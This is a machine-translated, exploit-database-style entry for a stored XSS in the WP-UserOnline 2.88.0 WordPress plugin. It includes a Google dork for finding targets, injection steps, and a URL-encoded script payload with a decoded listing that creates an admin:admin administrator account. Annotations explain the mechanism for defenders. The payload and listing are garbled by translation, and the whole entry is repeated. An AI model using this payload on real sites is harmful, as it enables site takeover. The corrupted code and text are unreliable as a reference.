# Exploit Title: WP-UserOnline 2.88.0 - 存储型跨站脚本 (XSS)(需身份验证)
#Google Dork: inurl:/wp-content/plugins/wp-useronline/
#日期: 2024-06-12
#利用作者:OnurGöğebakan
#供应商homepage: https://github.com/lesterchan/wp-useronline
#软件link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
#类别: Web应用程序
#版本: 2.88.0
#测试在: WordPress 6.5.4 -Windows 10
#CVE : CVE-2022-2941
#解释:
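利用该存储型 XSS 漏洞,可以向 WordPress 添加新的管理员用户。注入点位于插件的设置页面(见下文步骤 1–2),因此攻击者必须先拥有一个能够保存 WP-UserOnline 设置的已登录账户,这正是标题中"需身份验证"的含义。本页测试的受影响版本为 2.88.0;防御方应将插件升级到更高版本,并核查站点中是否存在非预期的管理员账户。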
#Exploit:
1. 访问 http://poc.test/wp-admin/options-general.php?page=userOnline-settings
2. 单击"保存"并拦截该请求。
3. 将 `命名%5bbots%5D` 参数的值替换为下面的有效载荷(注意:参数名的前半部分和下面的载荷文本在本页的机器翻译过程中被改动,并非原始的英文标识符)。
````````
%3CScript%3E+函数+处理程序%28%29+%7b+var+var+nonce+%3D+this.ResponSeText.Match%28%2fname%3D%22_wpnonce_create-u Ser%22+值%3D%22%28%5CW%2B%29%29%2F%29%5B1%5D%3B+VAR+Changereq+%3D+NEW+NEW+XMLHTTPREQUEST%28%29%29%3B+Changereq.phangereq.open%27%27%27 POST%27%2C%27%2FWP-ADMIN%2fuser-new.php%27%2cTrue%29%3B+Changereq.setRequestheader%28%27content-type%27%27%2C%2C%27Applicat离子%2FX www-form-urlencoded%27%29%3b+var+params+%3D+%27Action%3DCreateuser%26_wpnonce_create-user%3D%3D%27%2BNONCE%2Bnonce%2B%27% 26_WP_HTTP_REFERER%3D%252FWP-ADMIN%252Fuser-new.php%27%2B%27%26USER_LOGIN%3DADMIN%26email%26email%3DADMIN%2540mail.com%26 first_name%3D%26LAST_NAME%3D%26url%3D%26Pass1%3DADMIN%26Pass2%3DADMIN%26pw_weak%3DON%3DON%26Role%3Dadmin%26Createuser%3 DADD%2BNEW%2Buser%27%3B+Changereq.send%28Params%29%3B+%7D+var+req+%3D+新+XMLHTTPREQUEST%28%29%29%3B+REQ.ONLOAD+%3D+手LERESPONSE%3B+REQ.open%28%27Get%27%2C+%27%2FWP-ADMIN%2Fuser-new.php%27%2C+true%29%3B+REQ.SEND%28%29%29%29%3B+%3C%3C%2FScript%3E
````````
4. 当用户访问 http://poc.test/wp-admin/index.php?page=userOnline 时,有效载荷被执行。
5. 系统中会新增一个凭据为 Admin:Admin 的管理员用户。
#解码有效载荷
````````
// NOTE(review): this listing was damaged when the page was machine-translated
// (the leading keyword, identifier casing, the regular expression and the
// separators inside the form body are all altered), so it does not parse as
// JavaScript as shown. It is kept byte-for-byte here and annotated for analysis.
//
// What the script is written to do, in order:
//   1. The statements after the function issue an asynchronous GET for
//      /wp-admin/user-new.php and register the function as the onload callback.
//   2. The callback runs a regular expression over the response text and keeps
//      capture group 1, taken from the _wpnonce_create-user form field.
//   3. It then sends a form-encoded POST to /wp-admin/user-new.php whose body
//      starts with action=createuser and carries that nonce plus user_login,
//      email, pass1/pass2 and role fields.
//
// Why it matters for defenders: both URLs are site-relative, so the requests go
// to the same site that served the injected script, and the script reads the
// nonce out of the page itself. A CSRF nonce therefore does not stop script that
// already runs in the admin origin; the fix has to be escaping/sanitising the
// stored plugin setting. Presumably the requests ride on the session of whoever
// views the page -- nothing in this listing sets credentials explicitly.
// Traces to look for: a GET of user-new.php followed by a POST with
// action=createuser that the administrator did not initiate, and a new account
// matching the user_login value.
函数handleresponse(){
var nonce=this.responseText.match(/name='_ wpnonce_create-user'value='(\ w+)'/)'/)[1];
var changereq=new xmlhttprequest();
changereq.open('post','/wp-admin/user-new.php',true);
changereq.setRequestheader('content-type','application/x-www-form-urlencoded');
var params='action=createuser_wpnonce_create-user=' + nonce +
'_wp_http_referer=%2FWP-ADMIN%2fuser-new.php' +
'user_login=adminemail=admin%40mail.comfirst_name=last_name=url=pass1=adminpass2=adminpw_weak=onrole=abtistryatorCreateeuser=addairatorCreateuser=add+new+new+new+user';
changereq.send(params);
}
var req=new xmlhttprequest();
req.onload=handleresponse;
req.open('get','/wp-admin/user-new.php',true);
req.send();
````````
#Google Dork: inurl:/wp-content/plugins/wp-useronline/
#日期: 2024-06-12
#利用作者:OnurGöğebakan
#供应商homepage: https://github.com/lesterchan/wp-useronline
#软件link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
#类别: Web应用程序
#版本: 2.88.0
#测试在: WordPress 6.5.4 -Windows 10
#CVE : CVE-2022-2941
#解释:
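利用该存储型 XSS 漏洞,可以向 WordPress 添加新的管理员用户。注入点位于插件的设置页面(见下文步骤 1–2),因此攻击者必须先拥有一个能够保存 WP-UserOnline 设置的已登录账户。本页测试的受影响版本为 2.88.0;防御方应将插件升级到更高版本,并核查站点中是否存在非预期的管理员账户。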
#Exploit:
1. 访问 http://poc.test/wp-admin/options-general.php?page=userOnline-settings
2. 单击"保存"并拦截该请求。
3. 将 `命名%5bbots%5D` 参数的值替换为下面的有效载荷(注意:参数名的前半部分和下面的载荷文本在本页的机器翻译过程中被改动,并非原始的英文标识符)。
````````
%3CScript%3E+函数+处理程序%28%29+%7b+var+var+nonce+%3D+this.ResponSeText.Match%28%2fname%3D%22_wpnonce_create-u Ser%22+值%3D%22%28%5CW%2B%29%29%2F%29%5B1%5D%3B+VAR+Changereq+%3D+NEW+NEW+XMLHTTPREQUEST%28%29%29%3B+Changereq.phangereq.open%27%27%27 POST%27%2C%27%2FWP-ADMIN%2fuser-new.php%27%2cTrue%29%3B+Changereq.setRequestheader%28%27content-type%27%27%2C%2C%27Applicat离子%2FX www-form-urlencoded%27%29%3b+var+params+%3D+%27Action%3DCreateuser%26_wpnonce_create-user%3D%3D%27%2BNONCE%2Bnonce%2B%27% 26_WP_HTTP_REFERER%3D%252FWP-ADMIN%252Fuser-new.php%27%2B%27%26USER_LOGIN%3DADMIN%26email%26email%3DADMIN%2540mail.com%26 first_name%3D%26LAST_NAME%3D%26url%3D%26Pass1%3DADMIN%26Pass2%3DADMIN%26pw_weak%3DON%3DON%26Role%3Dadmin%26Createuser%3 DADD%2BNEW%2Buser%27%3B+Changereq.send%28Params%29%3B+%7D+var+req+%3D+新+XMLHTTPREQUEST%28%29%29%3B+REQ.ONLOAD+%3D+手LERESPONSE%3B+REQ.open%28%27Get%27%2C+%27%2FWP-ADMIN%2Fuser-new.php%27%2C+true%29%3B+REQ.SEND%28%29%29%29%3B+%3C%3C%2FScript%3E
````````
4. 当用户访问 http://poc.test/wp-admin/index.php?page=userOnline 时,有效载荷被执行。
5. 系统中会新增一个凭据为 Admin:Admin 的管理员用户。
#解码有效载荷
````````
// NOTE(review): this listing was damaged when the page was machine-translated
// (the leading keyword, identifier casing, the regular expression and the
// separators inside the form body are all altered), so it does not parse as
// JavaScript as shown. It is kept byte-for-byte here and annotated for analysis.
//
// What the script is written to do, in order:
//   1. The statements after the function issue an asynchronous GET for
//      /wp-admin/user-new.php and register the function as the onload callback.
//   2. The callback runs a regular expression over the response text and keeps
//      capture group 1, taken from the _wpnonce_create-user form field.
//   3. It then sends a form-encoded POST to /wp-admin/user-new.php whose body
//      starts with action=createuser and carries that nonce plus user_login,
//      email, pass1/pass2 and role fields.
//
// Why it matters for defenders: both URLs are site-relative, so the requests go
// to the same site that served the injected script, and the script reads the
// nonce out of the page itself. A CSRF nonce therefore does not stop script that
// already runs in the admin origin; the fix has to be escaping/sanitising the
// stored plugin setting. Presumably the requests ride on the session of whoever
// views the page -- nothing in this listing sets credentials explicitly.
// Traces to look for: a GET of user-new.php followed by a POST with
// action=createuser that the administrator did not initiate, and a new account
// matching the user_login value.
函数handleresponse(){
var nonce=this.responseText.match(/name='_ wpnonce_create-user'value='(\ w+)'/)'/)[1];
var changereq=new xmlhttprequest();
changereq.open('post','/wp-admin/user-new.php',true);
changereq.setRequestheader('content-type','application/x-www-form-urlencoded');
var params='action=createuser_wpnonce_create-user=' + nonce +
'_wp_http_referer=%2FWP-ADMIN%2fuser-new.php' +
'user_login=adminemail=admin%40mail.comfirst_name=last_name=url=pass1=adminpass2=adminpw_weak=onrole=abtistryatorCreateeuser=addairatorCreateuser=add+new+new+new+user';
changereq.send(params);
}
var req=new xmlhttprequest();
req.onload=handleresponse;
req.open('get','/wp-admin/user-new.php',true);
req.send();
````````